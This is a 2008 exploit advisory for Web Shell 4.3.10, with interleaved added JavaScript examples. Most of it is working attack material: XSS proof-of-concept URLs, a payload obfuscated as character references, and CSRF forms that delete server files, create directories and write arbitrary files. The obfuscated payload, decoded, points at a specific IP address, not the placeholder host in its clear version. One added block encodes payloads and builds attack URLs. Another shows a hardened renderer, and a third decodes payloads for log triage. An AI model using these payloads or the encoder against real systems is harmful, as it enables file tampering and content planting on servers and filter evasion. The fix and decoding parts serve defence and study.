
webshell431-xssxsrf.txt

Posted Oct 1, 2008
Authored by C1c4Tr1Z | Site lowsec.org

Web Shell version 4.3.10 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, web, shell, vulnerability, xss, csrf
SHA-256 | 6e8d82dccfcb8967815932a7827b2ac2a47e37b85a6e180963497ecd0c82fe86

#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery

Special thanks to OzX (http://www.nullbytes.net/)!

#========================================================================#
#=============================[XSS]======================================#

Proof-of-Concepts:

/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]
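The two PoCs above work because the fn and mask parameters are reflected into the response without any encoding. The following is an added example, not code from the advisory or from Web Shell, that puts a vulnerable rendering of the search form beside a hardened one; the function names, the HTML skeleton and the two payload strings (one decoded from the search PoC, one an attribute-breakout of the kind used against a quoted attribute) are assumptions for the demonstration.

```javascript
// Added example (not from the advisory or the Web Shell code base): the
// fn / mask parameters reflected into the page, unsafe and hardened.
// Function names and the HTML skeleton are assumed for the demonstration.

// Escape for HTML text and for double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Unsafe: concatenates the request parameters straight into the markup,
// which is what the two PoC URLs above exploit.
function renderSearchUnsafe(fld, mask) {
  return "<p>Search for '" + mask + "' in " + fld + "</p>\n" +
         "<input type='text' name='mask' value='" + mask + "'>";
}

// Hardened: the same template with every untrusted value escaped for the
// context it lands in. Both occurrences of mask sit inside single quotes,
// so escaping the single quote is essential, not optional.
function renderSearchSafe(fld, mask) {
  return "<p>Search for '" + escapeHtml(mask) + "' in " + escapeHtml(fld) + "</p>\n" +
         "<input type='text' name='mask' value='" + escapeHtml(mask) + "'>";
}

// Toy detector for the demo: does the output contain an element the
// template never emits? Enough to tell the two renderers apart.
function containsInjectedElement(html) {
  return /<(iframe|img|script)\b/i.test(html);
}

// Constructed inputs: the mask value from the search PoC (URL-decoded), and
// an attribute-breakout payload that closes the quoted value first.
const MASK_POC = "<iframe/src=javascript:alert(0)>";
const ATTR_POC = "1'><img/src/onerror=alert(1)>";
```

The hardened renderer only works because the template quotes every attribute; an unquoted attribute can still be broken out of with a space, which no escaping of the five characters above prevents.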

<!--
This injection lets you create a directory ("/XSS") by driving the application's own "create directory" form with a small piece of JavaScript.
Note: you can replace the window.open() with an <iframe> to make it stealthier.
Note2: the script is written as decimal HTML character references with the "&#" URL-encoded (%26%23), so it passes through the query string untouched and is only decoded by the HTML parser inside the onerror attribute.
Note3: this script uses XMLHttpRequest(), so test it on Firefox!
-->
/actions.php?m=sysinfo&tab=1'><img/src/onerror=%26%23119%26%23105%26%23116%26%23104%26%2340%26%23110%26%23101%26%23119%26%2332%26%2388%26%2377%26%2376%26%2372%26%23116%26%23116%26%23112%26%2382%26%23101%26%23113%26%23117%26%23101%26%23115%26%23116%26%2340%26%2341%26%2341%26%23123%26%2310%26%239%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2371%26%2369%26%2384%26%2339%26%2344%26%2339%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%2357%26%2356%26%2346%26%2349%26%2351%26%2349%26%2346%26%2349%26%2354%26%2352%26%2346%26%2353%26%2347%26%23119%26%23101%26%2398%26%23115%26%23104%26%23101%26%23108%26%23108%26%2352%26%2347%26%2397%26%2399%26%23116%26%23105%26%23111%26%23110%26%23115%26%2346%26%23112%26%23104%26%23112%26%2363%26%23109%26%2361%26%23102%26%23117%26%23116%26%23105%26%23108%26%23115%26%2338%26%2397%26%2399%26%2361%26%23109%26%23107%26%23100%26%2339%26%2344%26%23116%26%23114%26%23117%26%23101%26%2341%26%2344%26%2310%26%239%26%23115%26%23101%26%23110%26%23100%26%2340%26%23110%26%23117%26%23108%26%23108%26%2341%26%2344%26%2310%26%239%26%23111%26%23110%26%23114%26%23101%26%2397%26%23100%26%23121%26%23115%26%23116%26%2397%26%23116%26%23101%26%2399%26%23104%26%2397%26%23110%26%23103%26%23101%26%2361%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%2310%26%239%26%239%26%23105%26%23102%26%2340%26%23114%26%23101%26%2397%26%23100%26%23121%26%2383%26%23116%26%2397%26%23116%26%23101%26%2361%26%2361%26%2352%26%2332%26%2338%26%2338%26%2332%26%23115%26%23116%26%2397%26%23116%26%23117%26%23115%26%2361%26%2361%26%2350%26%2348%26%2348%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%23119%26%23105%26%23116%26%23104%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2339%26%2344%26%2339%26%2395%26%2398%26%23108%26%2397%26%23110%26%23107%26%2339%26%2341%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23119%26%23114%26%23105%26%23116%26%23101%26%2340%26%23114%26%23101%26%23115%26%23112%26%23111%26%23110%26%23115%26%23101%26%2384%26%23101%26%23120%26%23116%26%2346%26%23114%26%23101%26%23112%26%23108%26%2397%26%2399%26%23101%26%2340%26%2347%26%2360%26%2392%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2347%26%2344%26%2339%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23103%26%23101%26%23116%26%2369%26%23108%26%23101%26%23109%26%23101%26%23110%26%23116%26%23115%26%2366%26%23121%26%2384%26%2397%26%23103%26%2378%26%2397%26%23109%26%23101%26%2340%26%2334%26%23105%26%23110%26%23112%26%23117%26%23116%26%2334%26%2341%26%2391%26%2350%26%2393%26%2346%26%23118%26%2397%26%23108%26%23117%26%23101%26%2361%26%2334%26%2388%26%2383%26%2383%26%2334%26%2359%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23102%26%23111%26%23114%26%23109%26%23115%26%2391%26%2348%26%2393%26%2346%26%23115%26%23117%26%2398%26%23109%26%23105%26%23116%26%2340%26%2341%26%2359%26%2360%26%2392%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%2360%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2339%26%2341%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23108%26%23111%26%23115%26%23101%26%2340%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%23125%26%2310%26%239%26%239%26%23125%26%2310%26%239%26%23125%26%2359%26%2310%26%23125>

clear js script:
----------------

with(new XMLHttpRequest()){
    // same-origin GET for the "create directory" form; the victim's session cookie is sent automatically
    open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),
    send(null),
    onreadystatechange=function(){
        if(readyState==4 && status==200){
            // render the fetched form in a new window, fill in the directory name and auto-submit it
            with(window.open('','_blank')){
                document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));
                document.close();
            }
        }
    };
}
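The encoded sysinfo payload above is the clear script written as decimal HTML character references with the leading "&#" URL-encoded. The following added example (not from the advisory or from Web Shell) implements both directions of that obfuscation and rebuilds a PoC URL of the same shape from an arbitrary piece of JavaScript; the function names and the base URL are assumptions.

```javascript
// Added example (not part of the original advisory): build and undo the
// obfuscation used in the sysinfo payload. Each character of the script
// becomes a decimal character reference (&#NNN) and the "&#" is then
// URL-encoded as %26%23, so the text survives the query string and is
// decoded only by the HTML parser inside the onerror attribute.

// "with" -> "%26%23119%26%23105%26%23116%26%23104"
function encodeOnerrorPayload(js) {
  let out = '';
  for (const ch of js) {          // iterates by code point, not UTF-16 unit
    out += '%26%23' + ch.codePointAt(0);
  }
  return out;
}

// Reverse of the above. Whitespace is dropped first (a copied payload is
// often line-wrapped), then the %26%23 sequences are URL-decoded, then the
// decimal or hexadecimal references are resolved. The trailing ';' is
// optional, as it is in the PoC.
function decodeOnerrorPayload(encoded) {
  const urlDecoded = decodeURIComponent(encoded.replace(/\s+/g, ''));
  return urlDecoded.replace(/&#(x[0-9a-f]+|\d+);?/gi, (match, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(cp);
  });
}

// Rebuild a PoC URL with the same attribute-breakout shape as the advisory's.
// The base URL is an assumption for the demonstration.
function buildSysinfoUrl(base, js) {
  return base + "/actions.php?m=sysinfo&tab=1'><img/src/onerror=" +
         encodeOnerrorPayload(js) + '>';
}
```

The decoder is also the quickest way to triage an obfuscated payload pulled from a web server log: run it over the onerror value and read the plain JavaScript instead of counting character codes by hand.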

#========================================================================#
#============================[CSRF]======================================#

Every state-changing action in the application is vulnerable to CSRF: the requests below carry nothing that an attacker's page cannot forge.

Proof-of-Concepts:

<!--
Delete a file from the server.
-->
<img src="http://www.victim.com/actions.php?m=overkill&kill=1&pos=0&fn=FILENAME">


<!--
Create a directory. (Someone could test whether this can also lead to XSS.)
-->
<form name='mkd' method='POST' action='http://www.victim.com/actions.php?m=futils&ac=mkd&create=1' enctype='application/x-www-form-urlencoded'>
<input type='hidden' name='do' value='yes'>
<INPUT type='text' class='text' name='dest' value="PATH">
<INPUT type='text' class='text' name='fld' value="DIR_NAME">
</form>
<script>document.forms[0].submit()</script>


<!--
Create a file with any type of content. (This is more than dangerous, this is madness..)
-->
<FORM name='editor' action='http://www.victim.com/actions.php?m=edit&save=1' method='POST' enctype='application/x-www-form-urlencoded'>
<INPUT type="hidden" name="dest">
<INPUT type='text' name='fln' value='/web_dir/FILENAME'>
<TEXTAREA name='body'>
FILE_CONTENT
</TEXTAREA>
</form>
<script>document.forms[0].submit();</script>

#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://www.lowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#